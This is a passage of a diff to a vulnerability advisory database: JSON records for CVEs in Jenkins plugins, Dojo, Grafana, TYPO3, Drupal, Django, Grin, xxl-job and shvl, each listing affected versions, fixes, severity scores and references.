Pipeline", + "details": "Arbitrary code execution due to incomplete sandbox protection: Constructors, instance variable initializers, and instance initializers in Pipeline scripts were not subject to sandbox protection, and could therefore execute arbitrary code. This could be exploited e.g. by regular Jenkins users with the permission to configure Pipelines in Jenkins, or by trusted committers to repositories containing Jenkinsfiles.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins.workflow:workflow-cps" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.36.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.36" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000096" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/99571" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:45:53Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json b/advisories/github-reviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json new file mode 100644 index 0000000000000..454f00c75314c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json @@ -0,0 +1,174 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmjh-45vj-hfvf", + "modified": "2024-02-08T15:49:12Z", + "published": "2022-05-17T05:50:10Z", + "aliases": [ + "CVE-2010-2274" + ], + "summary": "Dojo Open Redirect vulnerability", + "details": "Multiple open redirect vulnerabilities in Dojo 1.0.x before 1.0.3, 1.1.x before 1.1.2, 1.2.x before 1.2.4, 1.3.x before 1.3.3, and 1.4.x before 1.4.2 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, possibly related to dojo/resources/iframe_history.html, dojox/av/FLAudio.js, dojox/av/FLVideo.js, dojox/av/resources/audio.swf, dojox/av/resources/video.swf, util/buildscripts/jslib/build.js, util/buildscripts/jslib/buildUtil.js, and util/doh/runner.html.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.dojotoolkit:dojo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.0.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.dojotoolkit:dojo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1.0" + }, + { + "fixed": "1.1.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.dojotoolkit:dojo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.2.0" + }, + { + "fixed": "1.2.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.dojotoolkit:dojo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.3.0" + }, + { + "fixed": "1.3.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.dojotoolkit:dojo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.4.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2274" + }, + { + "type": "PACKAGE", + "url": "https://github.com/cometd/dojo-maven" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100617172214/http://secunia.com/advisories/40007" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100629020444/http://secunia.com/advisories/38964" + }, + { + "type": "WEB", + "url": "http://dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisory/" + }, + { + "type": "WEB", + "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21431472" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50833" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50849" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50856" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50896" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50932" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50958" + }, + { + "type": "WEB", + "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50994" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:49:12Z", + "nvd_published_at": "2010-06-15T14:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json b/advisories/github-reviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json new file mode 100644 index 0000000000000..f8368678770aa --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmrv-3cqg-hpf9", + "modified": "2024-01-30T22:25:59Z", + "published": "2022-05-13T01:31:35Z", + "aliases": [ + "CVE-2019-1003007" + ], + "summary": "Sandbox Bypass via CSRF in Jenkins Warnings Plugin ", + "details": "A cross-site request forgery vulnerability exists in Jenkins Warnings Plugin 5.0.0 and earlier in src/main/java/hudson/plugins/warnings/GroovyParser.java that allows attackers to execute arbitrary code via a form validation HTTP endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:warnings" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.0.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.0.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003007" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jenkinsci/warnings-plugin" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1295%20%281%29" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1295%20(1)" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:25:59Z", + "nvd_published_at": "2019-02-06T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json b/advisories/github-reviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json new file mode 100644 index 0000000000000..39892e40f94c0 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqj3-fc39-73fj", + "modified": "2024-01-30T21:24:54Z", + "published": "2022-05-24T22:00:03Z", + "aliases": [ + "CVE-2019-10324" + ], + "summary": "Cross-site request forgery vulnerability in Jenkins Artifactory Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins Artifactory Plugin 3.2.2 and earlier in ReleaseAction#doSubmit, GradleReleaseApiAction#doStaging, MavenReleaseApiAction#doStaging, and UnifiedPromoteBuildAction#doSubmit allowed attackers to schedule a release build, perform release staging for Gradle and Maven projects, and promote previously staged builds, respectively.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:artifactory" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.2.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.2.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10324" + }, + { + "type": "WEB", + "url": "https://github.com/jenkinsci/artifactory-plugin/commit/687cc2b4e9ad62c0bdcee4afc9e8e90c5089ee58" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1347" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/108540" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:24:54Z", + "nvd_published_at": "2019-05-31T15:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json b/advisories/github-reviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json new file mode 100644 index 0000000000000..d49b1b9e6dc14 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvpr-q6rh-8vrp", + "modified": "2024-02-01T21:48:06Z", + "published": "2022-05-24T17:32:32Z", + "aliases": [ + "CVE-2020-24303" + ], + "summary": "Grafana XSS via a query alias for the ElasticSearch datasource", + "details": "Grafana before 7.1.0-beta 1 allows XSS via a query alias for the ElasticSearch datasource.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.1.0-beta1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24303" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/25401" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#710-beta-1-2020-07-01" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20201123-0002/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:48:06Z", + "nvd_published_at": "2020-10-28T14:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json b/advisories/github-reviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json new file mode 100644 index 0000000000000..06f39887e3223 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json @@ -0,0 +1,116 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mwqv-jff6-5v62", + "modified": "2024-02-08T00:03:06Z", + "published": "2022-05-17T05:47:13Z", + "aliases": [ + "CVE-2010-3715" + ], + "summary": "TYPO3 cross-site scripting (XSS) vulnerability in the RemoveXSS function and the backend", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 4.2.x before 4.2.15, 4.3.x before 4.3.7, and 4.4.x before 4.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the RemoveXSS function, and allow remote authenticated users to inject arbitrary web script or HTML via vectors related to (2) the backend.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3715" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/38ec239a35d50746a2f95eef004227acd1932b81" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/aba23d6f12775d31acd9b7197d5eeddca09d3574" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/ce47d8dcdc2cd67b7866a3a53d36aa8203311780" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111220151231/http://www.securityfocus.com/bid/43786" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2010/dsa-2121" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T00:03:06Z", + "nvd_published_at": "2010-10-25T20:01:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json b/advisories/github-reviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json new file mode 100644 index 0000000000000..68e2f7608c6d7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p3g4-9xfv-wq9v", + "modified": "2024-01-30T23:18:21Z", + "published": "2022-05-14T03:40:05Z", + "aliases": [ + "CVE-2018-1000058" + ], + "summary": "Arbitrary code execution due to incomplete sandbox protection in Pipeline: Supporting APIs Plugin", + "details": "Jenkins Pipeline: Supporting APIs Plugin 2.17 and earlier have an arbitrary code execution due to incomplete sandbox protection: Methods related to Java deserialization like readResolve implemented in Pipeline scripts were not subject to sandbox protection, and could therefore execute arbitrary code. This could be exploited e.g. by regular Jenkins users with the permission to configure Pipelines in Jenkins, or by trusted committers to repositories containing Jenkinsfiles.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins.workflow:workflow-support" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.18" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.17" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000058" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-02-05/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/103034" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:18:21Z", + "nvd_published_at": "2018-02-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json b/advisories/github-reviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json new file mode 100644 index 0000000000000..54d59da2ffde7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p498-rpcw-3578", + "modified": "2024-01-30T22:41:12Z", + "published": "2022-05-14T03:45:49Z", + "aliases": [ + "CVE-2018-1000012" + ], + "summary": "XXE vulnerability Jenkins Warnings Plugin", + "details": "Jenkins Warnings Plugin 4.64 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:warnings" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.65" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.64" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000012" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:41:12Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json b/advisories/github-reviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json new file mode 100644 index 0000000000000..a2a116dbdbb22 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json @@ -0,0 +1,102 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p6m5-h7pp-v2x5", + "modified": "2024-02-08T22:00:20Z", + "published": "2022-05-02T03:47:43Z", + "aliases": [ + "CVE-2009-3695" + ], + "summary": "Django's Insufficient Algorithmic Complexity Causes Denial of Service", + "details": "Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular expression.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0" + }, + { + "fixed": "1.0.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "Django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1" + }, + { + "fixed": "1.1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3695" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53727" + }, + { + "type": "PACKAGE", + "url": "https://github.com/django/django" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228171918/http://www.securityfocus.com/bid/36655" + }, + { + "type": "WEB", + "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=550457" + }, + { + "type": "WEB", + "url": "http://groups.google.com/group/django-users/browse_thread/thread/15df9e45118dfc51/" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2009/dsa-1905" + }, + { + "type": "WEB", + "url": "http://www.djangoproject.com/weblog/2009/oct/09/security/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2009/10/13/6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-407" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T22:00:20Z", + "nvd_published_at": "2009-10-13T10:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json b/advisories/github-reviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json new file mode 100644 index 0000000000000..1824738d9792d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p75g-gcv5-42qg", + "modified": "2024-02-01T21:47:51Z", + "published": "2022-05-24T17:24:33Z", + "aliases": [ + "CVE-2020-15899" + ], + "summary": "Grin insufficient data validation", + "details": "Grin 3.0.0 before 4.0.0 has insufficient validation of data related to Mimblewimble.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "grin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "4.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15899" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-15899.md" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin/compare/v3.1.1...v4.0.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:47:51Z", + "nvd_published_at": "2020-07-28T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-p9hp-3gpv-52w3/GHSA-p9hp-3gpv-52w3.json b/advisories/github-reviewed/2022/05/GHSA-p9hp-3gpv-52w3/GHSA-p9hp-3gpv-52w3.json index 38cb548509803..f61feb59c0c65 100644 --- a/advisories/github-reviewed/2022/05/GHSA-p9hp-3gpv-52w3/GHSA-p9hp-3gpv-52w3.json +++ b/advisories/github-reviewed/2022/05/GHSA-p9hp-3gpv-52w3/GHSA-p9hp-3gpv-52w3.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zendframework1" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.12.19" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,10 @@ "type": "WEB", "url": "https://framework.zend.com/security/advisory/ZF2016-02" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework1/CVE-2016-6233.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/zendframework/zendframework" diff --git a/advisories/github-reviewed/2022/05/GHSA-p9vf-4jx2-5hpp/GHSA-p9vf-4jx2-5hpp.json b/advisories/github-reviewed/2022/05/GHSA-p9vf-4jx2-5hpp/GHSA-p9vf-4jx2-5hpp.json index 030aa3ccf2255..358367fcff87c 100644 --- a/advisories/github-reviewed/2022/05/GHSA-p9vf-4jx2-5hpp/GHSA-p9vf-4jx2-5hpp.json +++ b/advisories/github-reviewed/2022/05/GHSA-p9vf-4jx2-5hpp/GHSA-p9vf-4jx2-5hpp.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8112" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8112.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json b/advisories/github-reviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json new file mode 100644 index 0000000000000..efd62b432549e --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json @@ -0,0 +1,78 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjmx-4gc6-hwv8", + "modified": "2024-02-08T15:36:31Z", + "published": "2022-05-17T05:48:23Z", + "aliases": [ + "CVE-2010-3094" + ], + "summary": "Drupal cross-site scripting vulnerability via actions feature and trigger module", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in Drupal 6.x before 6.18 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via (1) an action description, (2) an action message, (3) a node, or (4) a taxonomy term, related to the actions feature and the trigger module.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0" + }, + { + "fixed": "6.18" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3094" + }, + { + "type": "WEB", + "url": "https://github.com/drupal/drupal/commit/4e8e0454b3bfc3b846cf4b7bcaca0e8f42f0c17a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/drupal/drupal" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20120915000000*/http://www.securityfocus.com/bid/42391" + }, + { + "type": "WEB", + "url": "http://drupal.org/node/880476" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=128418560705305&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=128440896914512&w=2" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2010/dsa-2113" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:36:31Z", + "nvd_published_at": "2010-09-21T20:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json b/advisories/github-reviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json new file mode 100644 index 0000000000000..8038eccd62219 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqqj-299w-wf53", + "modified": "2024-02-01T21:49:08Z", + "published": "2022-05-24T17:27:18Z", + "aliases": [ + "CVE-2020-23814" + ], + "summary": "xxl-job Multiple cross-site scripting (XSS) vulnerabilities", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.xuxueli:xxl-job" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.3.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-23814" + }, + { + "type": "WEB", + "url": "https://github.com/xuxueli/xxl-job/issues/1866" + }, + { + "type": "WEB", + "url": "https://github.com/xuxueli/xxl-job/commit/227628567354d3c156951009d683c6fec3006e0e" + }, + { + "type": "WEB", + "url": "https://www.ccsq8.com/issues.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:49:08Z", + "nvd_published_at": "2020-09-03T17:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json b/advisories/github-reviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json new file mode 100644 index 0000000000000..8208bbc4150a4 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json @@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqwc-3vhw-qcvq", + "modified": "2024-02-01T21:00:24Z", + "published": "2022-05-24T17:37:25Z", + "aliases": [ + "CVE-2020-28278" + ], + "summary": "shvl vulnerable to prototype pollution", + "details": "### Overview\nPrototype pollution vulnerability in 'shvl' versions 1.0.0 through 2.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.\n\n### Details\nThe NPM module 'shvl' can be abused by Prototype Pollution 